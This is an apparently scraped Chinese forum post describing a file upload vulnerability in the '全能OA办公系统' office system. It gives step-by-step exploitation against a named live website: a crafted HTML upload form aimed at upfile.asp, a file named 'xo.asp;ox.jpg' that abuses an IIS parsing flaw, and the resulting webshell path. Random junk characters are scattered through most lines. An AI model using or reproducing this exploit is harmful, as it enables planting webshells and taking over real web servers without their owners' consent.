全能OA办公系统 上传漏洞; l' Z4 s+ Q/ q" k7 l6 k& {' E
2 T0 b1 R+ Q2 |6 q/ z* W系统介绍:& n1 f- J2 p$ U" G
( d" j) [9 c3 G; ]. c2 D$ O全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
1 D5 l; X8 t4 B6 n5 U) j2 D/ t0 s6 k. u+ J9 m9 h, f& V5 G
主要功能:
8 l' [! I& b. L8 P; [* ~公司通告
" m2 W; z6 a8 A2 K9 u" Q6 w5 x: Z1 P工作计划 5 d. t& E$ i3 O
通讯助理
. ~$ N9 [4 d3 V9 Z客户资源
- k' V' o- E; S# N6 ^) w我的公文 5 R2 ^' e# O5 M0 y1 ^
公文传阅
& J. U0 Y2 e( J1 s公共资源
& G, O! j7 n3 {" b2 g; W资源预约
A5 g j* E. z/ W4 f( @今日考勤 & c' J: }# K. J& m/ \
个人计划 ( v, k/ A! y" O' A1 {* b0 L
个人通讯录
; M9 S: s: }: n7 o7 Y个人基本档案
* q, q6 F" i# X V/ M& Y& l* P' u' S未读邮件
( |) G/ w# ^& ~8 W0 o+ w" u, F发邮件
, y( W. E- I5 O收件夹
. m; I2 U) T F, f( V V; x寄件夹 1 _) D# K/ B q
网络硬盘
2 D9 P9 m: I+ R3 Y7 D, [1 q网络会议 ' |+ n1 b+ I) F' i2 b+ h9 g" u
网络调查 9 h; |- I' w1 q% _2 _6 e
交流论坛" L2 b0 Z% r7 L) G$ Z+ W: M
3 @) r8 x% P& Y$ b/ f# \有兴趣测试的朋友可以下源码看看# k' G& O5 p- m! v0 ~
8 K) _- q2 e7 Q+ M1 q# B6 b源码下载:
^0 O, Y* z; `+ ?, F5 f8 k5 y: q( q$ p( l; K- c: B) ]
http://www.mycodes.net/30/4750.htm- N7 [, f/ k" J% x9 u7 x# l' [- X2 f: @
( H5 j3 n4 M- `, }5 Y漏洞介绍:+ t& G. ^) j0 e' G, C0 p* @
+ i- s: g7 q% h+ o0 j, f, H8 U由upfile.asp上传文件漏洞引起
7 U( g* r: B/ O; q
, V1 z) e) [' R# \! q测试方法:( R7 f0 x# n; X8 Q H# E
6 O0 U0 L5 K; _0 a使用名小子上传http://www.itlynn.com/upfile.asp即可
" m2 p7 i% ]0 k0 v( O- v' I3 d( G5 U9 W
如果upfile.asp文件被删除不存在。; A- _% r) B5 `1 J" p
1 z/ z1 C2 h. a/ f. {' E
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。( I- c) w) u. c5 b
- U, k- k4 A; E( w
如果存在那么将如下代码保存为upfile.html。* |8 y# Q. l/ c. Y) H
) }, R! I' D) d$ o3 T然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。6 j6 A7 [/ {, W; o% w
. Y# j i' \" P
- R& q6 d2 r# u. Y" E: ?2 y0 Q! [/ ]* @
01 <table border='0' align="center" cellpadding="5"> 1 e0 J0 z8 z j: Z% A, x( M; d
; q) |) S% p- }5 X* z02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 3 B0 R7 j, T( B/ R) i1 ^' ^1 O6 L
* M# ?, M+ d' u3 T$ v( M: p03 <tr>
2 F! D9 u( d1 f; P% ^9 L3 n. V4 ~" `$ \6 R$ Q' B! U4 C
04 <td>报错:</td> : c$ X" Q( U0 S3 z
2 z9 E% E3 y |, M
05 <td><input type='radio' name='errnumber' value='0'> ; Z7 N9 M1 d: N+ d; y r3 U
# n! L7 g& Q$ `$ x' e8 S
06 自动更名
2 H. a0 J$ H) H( r( W5 \& w p" }1 f2 N# Z% O5 i! L8 Z4 F5 g
07 <input type='radio' name='errnumber' value='1' checked> 3 k* I- S0 |+ S8 {
$ o' b, _9 ]4 b, j1 v( ]08 报错方式
- @& K& V* S+ C+ }) Y
7 p6 b1 C8 q3 m09 <input type='radio' name='errnumber' value='2'>
U `+ J* H4 b% y" _1 E' j9 g: }7 P0 V& t' `$ r( K& ~2 b4 }
10 直接覆盖</td> * d% C* v+ G/ p; W& o9 D
( a; P3 q& M" c& s3 w/ W
11 </tr>
0 |. g2 Y2 L; Q
8 q7 o2 ^) U+ V- S2 y12 <tr>
3 b) |( B6 N' c! B# }2 X0 ~3 m: h2 o9 a1 r1 m
13 <td>主题:</td>
6 t: K+ r2 o3 g6 @1 z7 S9 }6 B' J7 j5 k
14 <td><input type='text' name='filename' size='30'></td>
' b4 s+ D n- S0 A8 L9 H' t1 B2 _+ u! f; V4 J
15 </tr> % e, ?/ @; Z1 t/ i; Y* v \; v) K) L0 M
! w, ~3 |! o; N: V4 q
16 <tr>
* g2 @3 r) S } i
/ ]" z8 D4 q/ I8 I2 M0 N17 <td>文件:</td> 8 Y7 E( B3 B% s6 C6 x% A
: @* ^7 B" l5 N0 G/ c18 <td><input type="file"name="fruit"size="30"></td> $ G2 h# c" x) d( ^: U: c
( f+ w& b k0 q7 f9 M19 </tr>
! ^- W" p# p7 o( h' k/ i& b! f$ o' n
# v s, M" R) h; J0 F20 <tr> + B T% s: o# Q; f H3 Z* p
% W) k& G, w# ?- L
21 <td valign='top'>简介:</td> % x h9 g- S$ N% L% y0 H/ e
4 ?: ?, f$ u5 V7 {+ Y+ U8 s22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> ( l- B$ ^) z k" h) {6 e' u
4 {9 @$ n! l6 D
23 </tr> 3 H& [/ N; w: {
; J) v8 G2 g. F
24 1 x% E# O+ e9 `7 w# _* S
3 G( _) o: a; V$ Z5 O' P
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
& R% o8 g- o4 q( _! p! h, {; I8 _" C5 l7 t3 C+ d5 c! T
26 </tr> 5 q$ o. X: p, \: j: U3 j- \; u8 C
% c3 i) }- k0 |' p# v% a
27 </form>
/ Y- E, C" z. [7 i! T; X2 i; J. a+ P/ a/ |, V$ A3 Z
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
' H3 |6 H3 u5 i9 Z) L0 \/ q
9 y& I) y5 Q! H: Z- |0 q
1 V0 a, x# h* H0 N9 C
6 a) V# a: N4 y3 T: _. I/ Z% P1 Q上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
& Z" p. R& i5 {: w" G M, |. D, f+ O; \2 i
此漏洞需要配合解析漏洞利用。
3 q% M: `0 Q% R; e* g; r9 b: A* `6 Q: [ l* `$ o2 h- A) Q4 o
|
发表于 2012-11-21 13:45:12
收藏
支持
反对